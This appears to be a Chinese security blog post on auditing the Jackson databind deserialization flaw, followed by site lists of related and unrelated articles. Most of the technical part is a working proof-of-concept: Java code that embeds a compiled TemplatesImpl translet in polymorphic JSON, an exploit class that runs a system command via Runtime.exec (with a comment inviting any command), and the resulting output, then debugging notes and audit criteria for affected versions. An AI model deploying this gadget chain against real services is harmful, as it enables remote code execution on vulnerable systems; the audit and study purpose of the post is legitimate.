1. JACKSON漏洞解析

poc代码:main.java

import com.fasterxml.jackson.databind.ObjectMapper;

import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;

import org.springframework.util.FileCopyUtils;

import java.io.ByteArrayOutputStream;

import java.io.File;

import java.io.FileInputStream;

import java.io.IOException;

/**

 * Created by Administrator on 2017/6/12.

 */

public class main {

    public static void main(String[] args)  {

        String MASIT_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

//改成exp存在的绝对路径

        String exp = readClassStr("D:\\workspace\\123\\target\\classes\\exp.class");

        String jsonInput = aposToQuotes("{\"object\":['com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',\n" +

                "{\n" +

                "'transletBytecodes':['"+exp+"'],\n" +

                "'transletName':'p',\n" +

                "'outputProperties':{}\n" +

                "}\n" +

                "]\n" +

                "}");

        System.out.printf(jsonInput);

        ObjectMapper mapper = new ObjectMapper();

        mapper.enableDefaultTyping();

        User user;

        try {

            user = mapper.readValue(jsonInput, User.class);

            System.out.println(user.getSex());

            System.out.println(user.getName());

        } catch (Exception e) {

            e.printStackTrace();

        }

    }

    public static String aposToQuotes(String json){

        return json.replace("'","\"");

    }

    public static String readClassStr(String cls){

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();

        try {

            FileCopyUtils.copy(new FileInputStream(new File(cls)),byteArrayOutputStream);

        } catch (IOException e) {

            e.printStackTrace();

        }

        return Base64.encode(byteArrayOutputStream.toByteArray());

   }

}

exp.java



import com.sun.javaws.progress.Progress;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.*;

/**
 * Created by Administrator on 2017/6/12.
 */
public class exp extends AbstractTranslet {
    public exp() throws Exception {

        try {
            BufferedReader br = null;
            //修改成你想要执行的命令
            Process p = Runtime.getRuntime().exec("ipconfig");
            br = new BufferedReader(new InputStreamReader(p.getInputStream()));

            String line = null;
            StringBuilder sb = new StringBuilder();
            while ((line = br.readLine()) != null) {
                sb.append(line + "\n");
                System.out.println(sb);
            }
            File file = new File("result.txt");
            //File file =new File("javaio-appendfile.txt");

            //if file doesnt exists, then create it
            if(!file.exists()){
                file.createNewFile();
            }

            //true = append file
            FileWriter fileWritter = new FileWriter(file.getName(),true);
            BufferedWriter bufferWritter = new BufferedWriter(fileWritter);
            bufferWritter.write(sb.toString());
            bufferWritter.close();
            System.out.println(sb);
        } catch (IOException e) {
            e.printStackTrace();

        }
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}


 




user.java




import java.io.Serializable;

import java.util.Arrays;

import java.util.InputMismatchException;

import java.util.Objects;

/**

 * Created by Administrator on 2017/6/12.

 */

public class User {

    private Object object;

    public Object getObject() {

        return object;

    }

    public void setObject(Object object) {

        this.object = object;

    }

}




尝试执行:
发现result.txt中存在结果




Windows IP ����

��̫�������� �������� 2:

   ý��״̬  . . . . . . . . . . . . : ý���ѶϿ�

   �����ض��� DNS ��׺ . . . . . . . : 

��̫�������� Npcap Loopback Adapter:

   �����ض��� DNS ��׺ . . . . . . . :

   �������� IPv6 ��ַ. . . . . . . . : fe80::b047:25da:330b:45d4%18

   �Զ����� IPv4 ��ַ  . . . . . . . : 169.254.69.212

   ��������  . . . . . . . . . . . . : 255.255.0.0

   Ĭ�����. . . . . . . . . . . . . : 

��̫�������� ��������:

   �����ض��� DNS ��׺ . . . . . . . :

   �������� IPv6 ��ַ. . . . . . . . : fe80::fd81:27ba:8b8b:4a72%12

   IPv4 ��ַ . . . . . . . . . . . . : 10.0.83.198

   ��������  . . . . . . . . . . . . : 255.255.255.0

   Ĭ�����. . . . . . . . . . . . . : 10.0.83.1




调试本地代码:
由于Jackson中是通过readValue执行命令,
按F7进入当前函数:


跳过几次赋值,进入到当前函数,发现次函数中存在反序列化的赋值,按F7进行调试




经过多次调试发现,命令在标红处代码执行,并抛出异常




多部调试,F7进入函数代码(SetterlessProperty.java):




代码执行:




2. Jackson反序列化漏洞如何审计


OK,说到这就简单介绍了下,Jackson的反序列化代码运行的过程,那么现在代码审计中如何审计的出来项目是否包含Jackson反序列化呢?


第一步:看版本,如果Jackson的版本号不在存在漏洞的版本列表中,肯定不会有此漏洞,


版本列表:


Jackson 2.7版本(<2.7.10)


Jackson 2.8版本(<2.8.9)


第二步:你的Bean类中是否包含object类型的变量:


例如,我这边的User类中的Object变量定义为:private Object object


第三步:Jackson的ObjectMapper必须调用enableDefaultTyping:


ObjectMapper mapper = new ObjectMapper();


mapper.enableDefaultTyping();


满足以上三个要求,才能进行构造POC进行校验。
												


											
小白审计JACKSON反序列化漏洞的更多相关文章
	

    
								
  1. php反序列化漏洞复现
		
    超适合小白的php反序列化漏洞复现 写在前头的话 在OWASP TOP10中,反序列化已经榜上有名,但是究竟什么是反序列化,我觉得应该进下心来好好思考下.我觉得学习的时候,所有的问题都应该问3个问题: ...
    
		
    2. 
						
  2. ThinkPHP v6.0.x 反序列化漏洞利用
		
    前言: 上次做了成信大的安询杯第二届CTF比赛,遇到一个tp6的题,给了源码,目的是让通过pop链审计出反序列化漏洞. 这里总结一下tp6的反序列化漏洞的利用. 0x01环境搭建 现在tp新版本的官网 ...
    
		
    3. 
						
  3. [原题复现+审计][0CTF 2016] WEB piapiapia(反序列化、数组绕过)[改变序列化长度,导致反序列化漏洞]
		
    简介  原题复现:  考察知识点:反序列化.数组绕过  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组 ...
    
		
    4. 
						
  4. Java审计之CMS中的那些反序列化漏洞
		
    Java审计之CMS中的那些反序列化漏洞 0x00 前言 过年这段时间比较无聊,找了一套源码审计了一下,发现几个有意思的点拿出来给分享一下. 0x01 XStream 反序列化漏洞 下载源码下来发现并 ...
    
		
    5. 
						
  5. PHP审计之PHP反序列化漏洞
		
    PHP审计之PHP反序列化漏洞 前言 一直不懂,PHP反序列化感觉上比Java的反序列化难上不少.但归根结底还是serialize和unserialize中的一些问题. 在此不做多的介绍. 魔术方法  ...
    
		
    6. 
						
  6. php代码审计9审计反序列化漏洞
		
    序列化与反序列化:序列化:把对象转换为字节序列的过程称为对象的序列化反序列化:把字节序列恢复为对象的过程称为对象的反序列化 漏洞成因:反序列化对象中存在魔术方法,而且魔术方法中的代码可以被控制,漏洞根 ...
    
		
    7. 
						
  7. Java反序列化漏洞通用利用分析
		
    原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/ 博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重.长亭科技分析的非常细致 ...
    
		
    8. 
						
  8. Java反序列化漏洞分析
		
    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...
    
		
    9. 
						
  9. .NET高级代码审计(第五课) .NET Remoting反序列化漏洞
		
    0x00 前言 最近几天国外安全研究员Soroush Dalili (@irsdl)公布了.NET Remoting应用程序可能存在反序列化安全风险,当服务端使用HTTP信道中的SoapServerF ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. centos7安装redis3.0和phpredis扩展详细教程(图文)
			
    整理一下centos7安装redis3.0和phpredis扩展的过程,有需要的朋友可以拿去使用. 一.安装redis3.0 1.安装必要的包 yum install gcc 2.centos7安装r ...
    
			
    2. 
						
  2. jsp实现仿QQ空间新建多个相册名称,向相册中添加照片
			
    工具:Eclipse,Oracle,smartupload.jar:语言:jsp,Java:数据存储:Oracle. 实现功能介绍: 主要是新建相册,可以建多个相册,在相册中添加多张照片,删除照片,删 ...
    
			
    3. 
						
  3. iOS APP打包分发给远程的手机测试
			
    APP要打包给远程的朋友或客户测试,但又不是企业账号的情况下,我们只能根据手机的udid进行描述证书的配置,再打包分发给提供了udid的手机进行安装 一.如何得到udid? 手机连接到mac电脑,打开 ...
    
			
    4. 
						
  4. Python进阶之装饰器
			
    函数也是对象 要理解Python装饰器,首先要明白在Python中,函数也是一种对象,因此可以把定义函数时的函数名看作是函数对象的一个引用.既然是引用,因此可以将函数赋值给一个变量,也可以把函数作为一 ...
    
			
    5. 
						
  5. Mybatis和JDBC区别
			
    今天面试中问了这个问题,当时答的不好,现在整理一下. JDBC是Java提供的一个操作数据库的API: MyBatis是一个支持普通SQL查询,存储过程和高级映射的优秀持久层框架.MyBatis消除了 ...
    
			
    6. 
						
  6. 运用三角不等式加速Kmeans聚类算法
			
    运用三角不等式加速Kmeans聚类算法 引言:最近在刷<数据挖掘导论>,第九章, 9.5.1小节有提到,可以用三角不等式,减少不必要的距离计算,从而达到加速聚类算法的目的.这在超大数据量的 ...
    
			
    7. 
						
  7. HDU4686——Arc of Dream矩阵快速幂
			
    题目链接: http://acm.hdu.edu.cn/showproblem.php?pid=4686 题目大意: 已知a0=A0, ai=Ax*ai-1+Ay; b0=B0, bi=Bx*bi-1 ...
    
			
    8. 
						
  8. [笔记]机器学习(Machine Learning) - 00.目录/大纲/写在之前
			
    目录会根据我的学习进度而更新,给自己列一个大纲以系统地看待整个学习过程. 学习资料来源 学习的是Coursera上吴恩达(Andrew Ng)老师的机器学习视频(课程传送门,最近在"最强大脑 ...
    
			
    9. 
						
  9. XSS攻击及预防
			
    跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶意攻击者往Web页面里插 ...
    
			
    10. 
						
  10. Java数组的排序算法
			
    在Java中,实现数组的排序算法有很多,如冒泡排序法.选择排序法.直接插入法和快速排序法等.下面介绍几种排序算法的具体 实现. 本文引用文献:Java必须知道的300个问题. 1.冒泡排序法 1.1  ...
    
			
    11.